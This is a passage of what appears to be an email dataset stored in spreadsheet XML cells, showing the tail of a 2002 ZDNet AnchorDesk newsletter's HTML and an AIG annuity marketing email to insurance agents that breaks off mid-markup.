 ntpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;img src=3D"http://techupdate.zdne=
 t.com/techupdate/i/arrow_blue.gif" width=3D"8" height=3D"10" border=3D"0" a=
 lt=3D"" /&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://cli=
 ckthru.online.com/Click?q=3Dfe-xkIgQwgwkMs4UcSeE4rbg6amtI4R" style=3D"text-=
 decoration:none"&gt;Read our Full Review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;   &lt;/table&gt; &lt;/td&gt;=
  &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td width=3D"180"&gt;  &lt;table cellpadding=3D"0" cel=
 lspacing=3D"0" width=3D"180" border=3D"0" bgcolor=3D"#eeeeee"&gt;        &lt;tr b=
 gcolor=3D"#999999"&gt;&lt;td colspan=3D"3" height=3D"15"&gt;&lt;font face=3D"ms sans se=
 rif, geneva" color=3D"#ffffff" size=3D"-2"&gt;yMost Popular Products&lt;/font&gt;&lt;/t=
 d&gt;&lt;/tr&gt;  &lt;tr&gt;    &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/f=
 rontpage/b.gif" width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;    =
      &lt;td&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http:=
 //www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"=
 5" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;Handhelds&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http=
 ://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D=
 "7" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;       &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickt=
 hru.online.com/Click?q=3D13-NxSZI3XW8SiY3FwssDLfzpHOCerR" style=3D"text-dec=
 oration:none"&gt;Toshiba Pocket PC e310&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.=
 com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" =
 border=3D"0" /&gt;&lt;br /&gt;       &lt;b&gt;2&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.co=
 m/Click?q=3D28-A2wXIRd4w3vWlFlEL2t1VlTK8yiR" style=3D"text-decoration:none"=
 &gt;Toshiba Pocket PC e740&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/=
 anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" =
 /&gt;&lt;br /&gt;      &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3D3d=
 -oi9NIbz4YX6n4S9vwlGWUTnaNtPR" style=3D"text-decoration:none"&gt;Palm m515&lt;/a&gt;=
 &lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif"=
  width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;4&lt;/b&gt;. &lt;a hr=
 ef=3D"http://clickthru.online.com/Click?q=3D52-LUXoIrJtdR2WZMcMWz8AtIQwjjnR=
 " style=3D"text-decoration:none"&gt;Palm Vx&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zd=
 net.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=
 =3D"" border=3D"0" /&gt;&lt;br /&gt;      &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.onli=
 ne.com/Click?q=3D67-PnDkIOEDqntDs-FWhKPAKa1CPIuR" style=3D"text-decoration:=
 none"&gt;Compaq iPaq H3835&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/=
 anchordesk/frontpage/b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0" =
 /&gt;&lt;br /&gt;    &lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_blue=
 .gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"http:=
 //clickthru.online.com/Click?q=3D7c-7NCZIZWccN3HBUxfLHDx1984BOsR" style=3D"=
 text-decoration:none"&gt;More popular PDAs&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;    &lt;img src=3D"http:/=
 /www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"1=
 0" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;/font&gt;&lt;/td&gt;    &lt;td&gt;&lt;img src=3D"http:/=
 /www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"10" height=3D"=
 1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;/tr&gt;   &lt;/table&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr v=
 align=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td colspan=
 =3D"7" bgcolor=3D"#999999"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchor=
 desk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt; &lt;/table&gt; &lt;!-- /### --=
 &gt; &lt;table cellpadding=3D10 border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D92-ubRVQTzT5IB3xtHzeFOPq1FsnynR" &gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/header2_news.gif" width=3D"150" height=3D"2=
 0" border=3D"0" vspace=3D10 alt=3D"News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;SYLVIA CARR&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/442.gif" alt=3D"SYLVIA CARR" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3Da7-fR_2Q8BwVDMi5xHLF5vLk7KCgFeR" &gt;&lt;b&gt;Tech=
  bids for security money... Fridge viruses... USA Today hacked&lt;/b&gt;&lt;/a&gt;&lt;br&gt;T=
 ech companies long for a piece of the billion-dollar government IT budget. =
 Plus: Computer viruses may infect your fridge one day soon. And USA Today's=
  Web site is the latest victim of a hack attack. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3Dbc-zkPJQ6BdHnB-VFXmobF8XEDxwcyR" &gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/header2_your.gif" width=3D"150" height=3D"2=
 0" border=3D"0" vspace=3D10 alt=3D"News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID MORGENSTERN&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/445.gif" alt=3D"DAVID MORGENSTERN" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3Dd1-ulOzQpErJC7fidx10-kl0aSxkZlR" &gt;&lt;b&gt;The =
 many ways YOU'D change Microsoft Office&lt;/b&gt;&lt;/a&gt;&lt;br&gt;David Coursey recently p=
 resented his top ten wishes for how Microsoft could improve the next versio=
 n of Office. Turns out you have your own suggestions for making the office =
 suite better, too. David presents your ideas. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
         =20
        =20
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3De6-qG8rQwyqDDYWMlFXGugH6NQYvU4R" &gt;&lt;b&gt;Quic=
 kPoll results: Which office suite do you use?&lt;/b&gt; &lt;/a&gt;&lt;/font&gt;&lt;p&gt;
        =20
         &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/head=
 er2_expert.gif" width=3D"150" height=3D"20" border=3D"0" vspace=3D10 alt=3D=
 "Expert Advice"&gt;&lt;br&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;table cellpadding=3D0 cellspacing=3D0 =
 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID BERLIND&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/390.gif" alt=3D"DAVID BERLIND" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dfb-aWErQkg=
 qrGUnXAToFokcTbTDoVrR" &gt;&lt;b&gt;Wanna combo PDA/cell phone? Here's what to look =
 for&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clea=
 r.gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 With all the new gadgets out there merging PDAs with cell p=
 hones, choosing the right device is harder than ever. Before you lay down y=
 our cash, let David explain which features really matter, from Bluetooth to=
  thumbboards.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;table cellpadding=3D0 cellspacing=3D0 =
 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;PRESTON GRALLA&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/trim_blue.gif" width=3D"23" height=3D"15" border=3D"0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D4=
 08&gt;
                 &lt;tr&gt;&lt;td bgcolor=3D"#E4F2FF"&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D4=
 08&gt;
                 &lt;tr valign=3Dtop&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/authors/116.gif" alt=3D"PRESTON GRALLA" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D11-l8riI2-=
 4ELsHpx5X3VynhNBuCqlR" &gt;&lt;b&gt;How to defrag your hard drive--and speed up your=
  PC&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clea=
 r.gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Looking for a quick way to rev up your sluggish system? Try=
  defragmenting your hard drive. Since the Windows defrag tool is less than =
 ideal, Preston shows you three downloads that do a better job of it.&lt;/font&gt;=
 &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D26-KqPVIiMHolyBsSyBBBkqU8n=
 iQ74R" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3D3b-XhxVINdHnv20LoZFPcZsjpRp-LrR" &gt;&lt;b&gt;Previous Issue&lt;/b&gt;&lt;/a&gt;
 &lt;/div&gt;
 &lt;p&gt;
 &lt;img src=3D"http://www.zdnet.com/b.gif" width=3D1 height=3D10&gt;&lt;br&gt;
 &lt;/td&gt;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/main --&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612&gt;
 &lt;tr valign=3Dtop&gt;
 &lt;td width=3D1 bgcolor=3D"#83A3CB"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D10 bgcolor=3D"#1E5C99"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" =
 width=3D10 height=3D1&gt;&lt;br&gt;&lt;/td&gt;
 &lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D588 bgcolor=3D"#cccccc"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif"=
  width=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D10 bgcolor=3D"#1E5C99"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" =
 width=3D10 height=3D1&gt;&lt;br&gt;&lt;/td&gt;
 &lt;td width=3D1 bgcolor=3D"#83A3CB"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### subscription management ### --&gt;
 &lt;table width=3D"612" bgcolor=3D"#ffffef" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#83A3CB"&gt;&lt;img src=3D"http://www.zdnet.com/b.=
 gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#1E5C99"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif=
 " width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif"=
  width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" width=3D"12" heigh=
 t=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"564"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;img src=3D"h=
 ttp://www.zdnet.com/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
 &lt;font size=3D"3"&gt;&lt;b&gt;Sign up for more &lt;a href=3D'http://nl.com.com/servlet/u=
 rl_login?email=3Dqqqqqqqqqq-zdnet@example.com&amp;brand=3Dzdnet'&gt;free newsletter=
 s&lt;/a&gt; from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src=3D"http://www.zdnet.com/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@zzzason.or=
 g&lt;/font&gt;&lt;/font&gt;
       &lt;p&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;font face=3D"ms sans =
 serif, geneva" size=3D"-2"&gt;=20
         &lt;a NOTRACK href=3D'http://clickthru.online.com/Click?q=3D50-M_UBzd0=
 5wuaY3lC9S5rwjwQuI7T5uRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@example.com&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3D65-K82zIDPtIgrQCKtD70VOf0m8P9ZR" &gt;FAQ&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D7a-EE_AIPBjU=
 rvH2Y-hU6coezkBZXdR" &gt;Advertise&lt;/a&gt;&lt;br&gt;
         &lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" width=3D"1" height=3D"8"&gt;&lt;/t=
 d&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" width=3D"12" heigh=
 t=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif"=
  width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#1E5C99"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif=
 " width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#83A3CB"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif"=
  width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /### subscription management ### --&gt;
 &lt;table width=3D612 cellpadding=3D0 cellspacing=3D0 border=3D0&gt;&lt;tr&gt;
 &lt;td width=3D1 bgcolor=3D"#83A3CB"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D10 bgcolor=3D"#1E5C99"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" =
 width=3D10 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D588 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif"=
  width=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D10 bgcolor=3D"#1E5C99"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" =
 width=3D10 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D1 bgcolor=3D"#83A3CB"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D612 cellpadding=3D0 cellspacing=3D0 border=3D0&gt;&lt;tr bgcolor=
 =3D"#1E5C99"&gt;
 &lt;td width=3D1 bgcolor=3D"#83A3CB"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;td width=3D10&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" width=3D10 height=3D=
 1&gt;&lt;/td&gt;
 &lt;td width=3D75&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D8f-OOYvQ8KK=
 wWVqRowXvsg9tyQFWveR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Da5-DyaHQ7ZTa_hHrGvsIC1b=
 2OB8OEPR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3Dba-m-45QXpKAW8cckTxhOmI_uIUEknR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3Dcf-ebM-QLw2HwY=
 0dhWJaylIO7r3fxeR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3De4-ABYFQVkWGjER585I81u0PT_Qv1yR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3Df9-mtKTQxOWPQ43Hb2SM_svdGheo-lR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3D0e--eOTIiQzHxFUGBL4r8dJx=
 98lbK4R" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3D23-sFcGINM8KMs305CiAv2Y9ZZvQKrR" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D38-bLkmIRM=
 2PYhjcY_nhJiSUxuD-DiR" style=3D"color: #fff"&gt;Careers&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D1 bgcolor=3D"#83A3CB"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" w=
 idth=3D1 height=3D1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D612 cellpadding=3D0 cellspacing=3D0 border=3D0&gt;
 &lt;tr&gt;&lt;td bgcolor=3D"#83A3CB"&gt;&lt;img src=3D"http://www.zdnet.com/b.gif" width=
 =3D1 height=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#ffffff"&gt;&lt;tabl=
 e width=3D100% border=3D0 cellspacing=3D2 cellpadding=3D1&gt; &lt;tr valign=3Dbot=
 tom&gt; &lt;td width=3D75% height=3D31&gt; &lt;p&gt;&lt;/font&gt; &lt;br&gt;&lt;b&gt;&lt;font face=3DArial, Hel=
 vetica, sans-serif size=3D2&gt;    Copyright 2002 CNET Networks, Inc. All righ=
 ts reserved. ZDNet is a registered service mark of CNET Networks, Inc.    &lt;=
 /font&gt;&lt;/b&gt; &lt;/p&gt;&lt;/td&gt;&lt;td height=3D31 valign=3Dtop&gt; &lt;div align=3Dright&gt; &lt;img =
 src=3D"http://gserv.zdnet.com/clear/outbound.gif?APPID=3D2&amp;EMID=3D25136482&amp;=
 NL=3De501-01&amp;ISSUE=3D2002-07-15" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Ddf-1=
 kzh-1Elx2t1PRqyYW5XJUS6xdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 9% Commission on MYG Annuities
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_14FD9B_01C23266.747F2DA0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  	 When AIG talks annuities...your clients listen!=09
  	 Year 1: 8.90% Guaranteed=0A=
 Year 2-6: 4.90% Guaranteed=09
  =09
  Commission: 9%=09
  	=20
 Call or e-mail &lt;mailto:jerry_livers@aigannuity.com&gt;  us Today!
  888-237-4210
 ? or ?=20
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 =20
  AIG Annuity
 For agent use only.=20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_14FD9B_01C23266.747F2DA0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;9% Commission on MYG Annuities&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"arial,helvetica,sans-serif"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF" bordercolor=3D"#000000" =
 border=3D"1"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/Images/AIG/talk/20020625-101a.jpg" width=3D"174" =
 height=3D"149"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/Images/AIG/talk/20020625-102a.gif" width=3D"376" =
 height=3D"149" alt=3D'When AIG talks annuities...your clients =
 listen!'&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td rowspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/Images/AIG/talk/20020625-103a.gif" width=3D"174" =
 height=3D"124"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/Images/AIG/talk/20020625-104a.gif" width=3D"376" =
 height=3D"92" alt=3D'Year 1: 8.90% Guaranteed&amp;#10;Year 2-6: 4.90% =
 Guaranteed'&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/Images/AIG/talk/20020625-105a.gif" width=3D"376" =
 height=3D"32"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/Images/AIG/talk/20020625-2.gif" width=3D"550" =
 height=3D"53" alt=3D'Commission: 9%'&gt;&lt;/td&gt;
         &lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&amp;nbsp;&lt;/td&gt;
 				&lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font size=3D"2"&gt;&lt;b&gt;Call or &lt;a =
 href=3D"mailto:jerry_livers@aigannuity.com"&gt;e-mail&lt;/a&gt; us Today!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/AIG/talk/20020625-3.gif" =
 width=3D"550" height=3D"89" alt=3D"888-237-4210"&gt;&lt;br&gt;
